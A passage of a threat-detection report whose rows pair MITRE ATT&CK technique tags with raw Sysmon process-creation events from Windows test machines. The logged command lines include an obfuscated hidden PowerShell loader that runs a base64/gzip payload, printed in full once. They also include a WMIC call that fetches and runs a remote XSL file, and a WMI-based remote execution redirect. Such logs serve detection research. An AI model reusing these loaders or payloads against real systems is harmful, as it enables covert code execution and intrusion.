</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:51.965</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;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&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-00101C1A1900</Data>
<Data Name=""ParentProcessId"">3348</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;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&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.286383,2019-07-30T01:33:58.286383+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.256845Z"">
</TimeCreated>
<EventRecordID>4945</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.245</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010E32E8B00</Data>
<Data Name=""ProcessId"">5084</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656012.106089,2019-05-01T00:26:52.106089+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k
11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:52.090464Z"">
</TimeCreated>
<EventRecordID>9807</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:51.949</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8B-5CC8-0000-00101C1A1900</Data>
<Data Name=""ProcessId"">3348</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;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&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2586-5CC9-0000-0010DC530000</Data>
<Data Name=""ParentProcessId"">460</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1594332063.89924,2020-07-10T02:01:03.899240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-09T22:01:03.898570Z"">
</TimeCreated>
<EventRecordID>311373</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3280"" ThreadID=""1044"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-09 22:01:03.894</Data>
<Data Name=""ProcessGuid"">747F3D96-939F-5F07-0000-0010888E4600</Data>
<Data Name=""ProcessId"">7456</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-86FA-5F07-0000-00204A8B0600</Data>
<Data Name=""LogonId"">0x68b4a</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-86FC-5F07-0000-00101E4B0700</Data>
<Data Name=""ParentProcessId"">2356</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436034.630548,2019-07-30T01:33:54.630548+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:54.246154Z"">
</TimeCreated>
<EventRecordID>4941</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:54.044</Data>
<Data Name=""ProcessGuid"">747F3D96-6642-5D3F-0000-0010F69D8A00</Data>
<Data Name=""ProcessId"">4896</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6641-5D3F-0000-0010A38C8A00</Data>
<Data Name=""ParentProcessId"">4260</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028567.80776,2019-03-20T00:49:27.807760+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:49:27.787731Z"">
</TimeCreated>
<EventRecordID>1966388</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:49:27.697</Data>
<Data Name=""ProcessGuid"">365ABB72-55D7-5C91-0000-001067BD0700</Data>
<Data Name=""ProcessId"">2236</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.436954Z"">
</TimeCreated>
<EventRecordID>421218</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.428</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-00109EB23300</Data>
<Data Name=""ProcessId"">2628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.436954Z"">
</TimeCreated>
<EventRecordID>421218</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.428</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-00109EB23300</Data>
<Data Name=""ProcessId"">2628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.436954Z"">
</TimeCreated>
<EventRecordID>421218</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.428</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-00109EB23300</Data>
<Data Name=""ProcessId"">2628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
